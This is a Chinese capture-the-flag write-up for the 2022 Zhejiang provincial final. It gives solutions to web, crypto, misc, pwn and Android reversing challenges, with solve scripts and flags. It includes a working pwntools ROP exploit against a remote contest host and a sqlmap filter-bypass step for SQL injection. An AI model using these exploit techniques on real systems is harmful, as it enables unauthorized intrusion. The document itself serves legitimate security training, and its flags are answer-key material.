2022浙江省决

发表于 更新于 阅读次数:

babysql:直接输入框按照常规思路进行注入,发现把空格给禁了,直接用sqlmap的space2comment模块跑

图片

math:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import gmpy2
from Crypto.Util.number import * 
import math
str = 'abcdefghijklmnopqrstuvwxyz0123456789+='
n = 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333
key = n - 1
c = 'u66hp7nuh01puoaip10pi6o0vzavnu11'
flag = ''
for i in c :
    num = str.index(i)
    ans = (num - 7)  * gmpy2.invert(key,37) % 37
    flag += str[ans]
print(flag)
#DASCTF{799a03b7a82076f5028059681df1b722}

rssssa5:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
n = 21595945409392994055049935446570173194131443801801845658035469673666023560594683551197545038999238700810747167248724184844583697034436158042499504967916978621608536213230969406811902366916932032050583747070735750876593573387957847683066895725722366706359818941065483471589153682177234707645138490589285500875222568286916243861325846262164331536570517513524474322519145470883352586121892275861245291051589531534179640139953079522307426687782419075644619898733819937782418589025945603603989100805716550707637938272890461563518245458692411433603442554397633470070254229240718705126327921819662662201896576503865953330533
c = 1500765718465847687738186396037558689777598727005427859690647229619648539776087318379834790898189767401195002186003548094137654979353798325221367220839665289140547664641612525534203652911807047718681392766077895625388064095459224402032253429115181543725938853591119977152518616563668740574496233135226296439754690903570240135657268737729815911404733486976376064060345507410815912670147466261149162470191619474107592103882894806322239740349433710606063058160148571050855845964674224651003832579701204330216602742005466066589981707592861990283864753628591214636813639371477417319679603330973431803849304579330791040664
p = 1426723861968216959675536598409491243380171101180592446441649834738166786277745723654950385796320682900434611832789544257790278878742420696344225394624591657752431494779
e = 0x10001
import gmpy2
from Crypto.Util.number import *
PR.<x> = PolynomialRing(Zmod(n))
f = x * 2 ** 560 + p
f = f.monic()
root = f.small_root(X=2^464,beta = 0.45,epslion=0.05)
p = int(root[0]) * 2 **560 + p
assert n % p == 0
q = n // p
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e,phi)
m = int(pow(c,d,n))
print(long_to_bytes(m))
#DASCTF{ce73935b2e83a78aa5079a9e59ae4980}

checkin_gift:

binwalk文件能发现存在两个jpg文件,用010打开搜索jpg的文件头,发现base64,用cyberchef直接解出

图片

m4a:

把m4a文件添加m4a后缀名,可得到摩斯密码音频文件,听了后解码可得到一段字符

BA43BCEFC204接着把附件放到010里,拉到最后可发现存在zip的压缩包倒置。

用脚本逆一下加上zip后缀得到压缩包

1
2
3
with open('m4a','rb') as f:
    with open('flag','wb') as g:
        g.write(f.read()[::-1])

提示需要密码,输入之前获得的字符,得到txt文本。拿去cyberchef解码,得到flag
Unkn0wnData图片

Unkn0wnData:

图片尾存在base64,然后解码能得到where is key和一串表情,可推测是aes-emoji

然后图片lsb zsteg可得到一串zip的hex 和上面的base64

将zip放入winhex存储为压缩包,打开是流量的txt文件,用脚本解码可得

1.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
f=open('key.txt','r')
fi=open('out.txt','w')
while 1:
    a=f.readline().strip()
    if a:
        if len(a)==16: 
            out=''
            for i in range(0,len(a),2):
                if i+2 != len(a):
                    out+=a[i]+a[i+1]+":"
                else:
                    out+=a[i]+a[i+1]
            fi.write(out)
            fi.write('\n')
    else:
        break
 
fi.close()

2.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
normalKeys = { 
   
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
     "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
      "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
       "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
         "22":"5", "23":"6","24":"7","25":"8","26":"9",
         "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
         "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
         "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
         "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
         "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
         "44":"<F11>","45":"<F12>"}
shiftKeys = { 
   
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
     "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
      "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
       "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
         "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
          "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
          "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
          "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
          "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
          "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
          "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
 
keys.close()
 
flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
 
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
 
print ('output :' + "".join(output))

用以上两个脚本先后解码可得
图片

可得密钥为Toggled

拿去aes-emoji解码

把以上的表情和密钥解码可得flag

DASCTF{ad15eecd2978bc5c70597d14985412c4}

 

 

PWN

GO-MAZE-v4

走完地图发现输出的是假flag,但是后门还是存在一个出入点,于是输入大量垃圾数据,发现程序崩溃,所以猜测存在栈溢出漏洞,然后静态分析,通过关键字符串可以定位到这里

图片

这里其实给了提示,v14这个参数存在溢出,然后就是构造rop链打orw。

exp:

1
 from pwn import * from time import * context.log_level='debug' #p=process('./pwn') p=remote('1.14.97.218', 26200) elf=ELF('./pwn') ​ poprax=0x400a4f syscall=0x4025ab poprdi=0x4008f6 poprsi=0x40416f poprdx=0x51d4b6 poprbx=0x402498 popdxsi=0x51d559 buf=0x98a000 leave=0x4015cb ​ rop=b'' rop=p64(poprdi)+p64(0)+p64(popdxsi)+p64(0x100)+p64(buf+0x300)+p64(syscall)+p64(leave) ​ payload=p64(0)+p64(poprax)+p64(2)+p64(poprdi)+p64(elf.search(b'flag').__next__())+p64(poprsi)+p64(0)+p64(syscall) payload+=p64(poprax)+p64(0)+p64(poprdi)+p64(3)+p64(poprsi)+p64(buf)+p64(poprdx)+p64(0x100)+p64(syscall) payload+=p64(poprax)+p64(1)+p64(poprdi)+p64(1)+p64(poprsi)+p64(buf)+p64(poprdx)+p64(0x100)+p64(syscall) ​ def maps():    p.sendline(b's')    p.sendline(b's')    p.sendline(b's')    p.sendline(b's')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'w')    p.sendline(b'w')    p.sendline(b'w')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'd')    p.sendline(b'w')    p.sendline(b'd')    p.sendline(b'w')    p.sendline(b'w') ​ def pwn():    p.recvuntil('flag')    p.sendline(b'a'*0x178+p64(buf+0x300)+rop)    p.send(payload) ​ maps() pwn() p.interactive()

RE

ezandroid

逆向后mainactivity如下图所示

图片

可以看到账号密码输入成功后进入afterlog

afterlog如下图所示

2

就放了一个视图,然后进入这个视图

图片

可以看到背景是一张图片,最后加压缩出图片可以看到flag

图片